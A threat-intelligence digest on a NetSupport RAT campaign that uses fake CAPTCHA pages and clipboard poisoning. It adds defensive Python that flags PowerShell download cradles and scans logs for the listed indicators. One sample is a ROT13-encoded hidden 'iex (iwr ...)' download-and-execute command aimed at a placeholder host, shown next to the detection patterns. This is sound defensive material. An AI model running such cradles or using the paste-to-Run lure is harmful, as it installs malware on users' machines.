How Threat Actors Exploit Human Trust: A Breakdown of the ‘Prove You Are Human’ Malware Scheme

A malicious campaign uses deceptive websites like spoofed Gitcodes and fake Docusign CAPTCHA pages to trick users into executing PowerShell scripts that install the NetSupport RAT on Windows machines. The multi-stage script downloaders evade detection by breaking the infection process into multiple phases, ultimately establishing persistence and control over victims’ systems. #NetSupportRAT #Gitcodes #DocusignSpoof

Keypoints

  • Attackers host malicious multi-stage PowerShell downloader scripts on spoofed Gitcodes and fake Docusign verification websites to distribute NetSupport RAT.
  • Victims are deceived into copying and pasting malicious scripts into the Windows Run prompt, initiating multi-stage payload downloads and execution.
  • The scripts use legitimate tools such as 7zip and modify Windows Registry “Run” keys to establish persistence under disguised names like “My Support.”
  • The campaign uses clipboard poisoning and ROT13 encoding techniques to evade signature-based detection and complicate analysis.
  • Associated infrastructure includes domains behind Cloudflare, registered with providers like NameCheap and NameSilo, and SSL certificates issued by WE1.
  • Related phishing campaigns leverage lookalike domains to mimic Docusign’s CAPTCHA pages and employ AJAX-based command and control (C2) to track infection progress.
  • Similar tactics and infrastructure patterns link this activity to known threat clusters that have previously abused NetSupport RAT, such as SocGholish and FIN7.

MITRE Techniques

  • [T1059.001] PowerShell – Attackers use PowerShell scripts as multi-stage downloaders to retrieve and execute additional payloads. (“the attacker uses malicious multi-stage downloader Powershell scripts…”)
  • [T1543.003] Windows Service – Persistence is achieved by creating new registry Run key entries to automatically start malware (“creates a new entry in the Windows Registry’s ‘Run’ key for the current user”).
  • [T1115] Clipboard Data – Clipboard poisoning is used to copy the malicious encoded script into the clipboard for the victim to paste and execute (“‘unsecuredCopyToClipboard()’ function is called, copying an encoded multi-layered string to the user’s clipboard”).
  • [T1071.001] Web Protocols – The malware performs multiple HTTP requests to C2 domains to check in and download further stages (“script reaches out to https[:]//tradingviewtool[.]com/info2.php…” and “makes an AJAX GET request to c.php every second”).
  • [T1027] Obfuscated Files or Information – The initial script on the Docusign spoofed site is ROT13 encoded to avoid detections (“initially ROT13 encoded, likely to avoid signature detections and obfuscation”).

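The ROT13 layer and the "paste this into the Run prompt" lure described in the keypoints and in the T1027 and T1115 entries above are cheap to check for on the defender's side. The following Python is an added example for this digest, not code from the DomainTools write-up: it takes a string of the kind a user might be tricked into pasting, examines it both as-is and after one ROT13 decoding, and counts PowerShell download-cradle indicators on each layer. The indicator patterns and the sample string (which points at the placeholder host example.invalid) are assumptions constructed for the example, not signatures or indicators taken from the page.

```python
import codecs
import re

# Download-cradle indicators typical of a "paste this into Run" lure.
# These patterns are assumptions for this example, not signatures from the page.
CRADLE_PATTERNS = {
    "powershell": r"\bpowershell(\.exe)?\b",
    "invoke-expression": r"\biex\b|invoke-expression",
    "web-download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b",
    "hidden-window": r"-w(indowstyle)?\s+hidden",
    "encoded-command": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "url": r"https?://",
}


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so this both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def analyze_pasted_text(text: str) -> dict:
    """Test the text as-is and after one ROT13 layer; return {layer: [indicator names]}.

    A hit only on the 'rot13' layer means the string was obfuscated, which is
    itself a strong signal: legitimate Run-prompt commands are not ROT13 encoded.
    """
    layers = {"raw": text, "rot13": rot13(text)}
    hits = {}
    for layer, candidate in layers.items():
        matched = [name for name, pattern in CRADLE_PATTERNS.items()
                   if re.search(pattern, candidate, re.IGNORECASE)]
        if matched:
            hits[layer] = matched
    return hits


def is_suspicious(text: str, min_indicators: int = 2) -> bool:
    """Flag the text when any layer trips at least `min_indicators` indicators."""
    return any(len(m) >= min_indicators for m in analyze_pasted_text(text).values())


# Constructed sample: ROT13 of a PowerShell download cradle that points at the
# placeholder host example.invalid. It is not an indicator from the campaign.
SAMPLE_ENCODED = "cbjrefuryy -j uvqqra vrk (vje uggcf://rknzcyr.vainyvq/n)"

if __name__ == "__main__":
    print(rot13(SAMPLE_ENCODED))
    print(analyze_pasted_text(SAMPLE_ENCODED))
    print("suspicious:", is_suspicious(SAMPLE_ENCODED))
    print("suspicious:", is_suspicious("cd Documents"))
```

The same check can be run over clipboard or Run-prompt history collected by an EDR; the useful property is that the encoded string scores zero on the raw layer and high on the decoded one, which separates obfuscated lures from ordinary administrative commands.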
Indicators of Compromise

  • [Domain] Malicious downloader hosting and C2 infrastructure – gitcodes[.]org, docusign.sa[.]com, tradingviewtool[.]com, tradingviewtoolz[.]com, mhousecreative[.]com
  • [File Hash] NetSupport RAT payload hashes – 3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7, 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd (zip file)
  • [File Name] Persistence and downloader executables – client32.exe, wbdims.exe, jp2launcher.exe
  • [IP Address] Associated network activity – 170.130.55[.]203:443
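To turn the indicator list above into something that can be run over proxy, EDR and firewall logs, here is an added Python example (not code from the DomainTools write-up). The domains, hashes, file names and IP:port are the ones published on this page, kept defanged in the source and refanged at match time; subdomains of a listed domain count as hits. The log line format and the sample lines are constructed for the example, including the assumed path under the user's profile for the "My Support" directory.

```python
import re

# Indicators of compromise as listed on the page, kept defanged here and
# refanged for matching.
DOMAINS = ["gitcodes[.]org", "docusign.sa[.]com", "tradingviewtool[.]com",
           "tradingviewtoolz[.]com", "mhousecreative[.]com"]
SHA256S = ["3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7",
           "254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd"]
FILE_NAMES = ["client32.exe", "wbdims.exe", "jp2launcher.exe"]
IP_PORTS = ["170.130.55[.]203:443"]

HOST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b")
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b")


def refang(ioc: str) -> str:
    """Convert the defanged notation used in reports back into a matchable value."""
    return ioc.replace("[.]", ".").replace("[:]", ":")


def scan_line(line: str) -> list:
    """Return unique (type, value) IoC matches found in one log line."""
    lower = line.lower()
    found = []

    def add(kind, value):
        if (kind, value) not in found:
            found.append((kind, value))

    domains = [refang(d) for d in DOMAINS]
    for host in HOST_RE.findall(lower):
        for d in domains:
            if host == d or host.endswith("." + d):   # subdomains count too
                add("domain", d)
    for digest in SHA256_RE.findall(lower):
        if digest in SHA256S:
            add("sha256", digest)
    for name in FILE_NAMES:
        # Match as a whole path component. A file-name hit alone is low
        # confidence: client32.exe is also the legitimate NetSupport Manager
        # client, so corroborate with the hash, path or network indicators.
        if re.search(r"(^|[\\/\s\"'])" + re.escape(name) + r"\b", lower):
            add("file", name)
    for ipp in IP_PORTS:
        if refang(ipp) in lower:
            add("ip", refang(ipp))
    return found


def scan_log(lines) -> list:
    """Scan every line; the result list is aligned with the input."""
    return [scan_line(line) for line in lines]


# Constructed sample log lines (proxy, EDR, firewall); the profile path for
# "My Support" is an assumption for the example, not a path from the page.
SAMPLE_LOG = [
    '2025-06-01T10:00:01Z proxy user=alice dst=www.gitcodes.org url="https://www.gitcodes.org/"',
    '2025-06-01T10:00:07Z proxy user=alice dst=tradingviewtool.com url="https://tradingviewtool.com/info2.php"',
    r'2025-06-01T10:00:09Z edr host=WS01 image="C:\Users\alice\AppData\Roaming\My Support\client32.exe" '
    'sha256=3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7',
    '2025-06-01T10:00:12Z fw host=WS01 dst=170.130.55.203:443 action=allow',
    '2025-06-01T10:01:00Z proxy user=bob dst=docs.python.org url="https://docs.python.org/3/"',
]

if __name__ == "__main__":
    for line, findings in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        if findings:
            print(findings, "<-", line)
```

Matching hosts by suffix rather than substring avoids false positives such as a benign domain that merely contains "gitcodes", while still catching the www. and other subdomains the campaign's pages are served from.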

Read more: https://dti.domaintools.com/how-threat-actors-exploit-human-trust/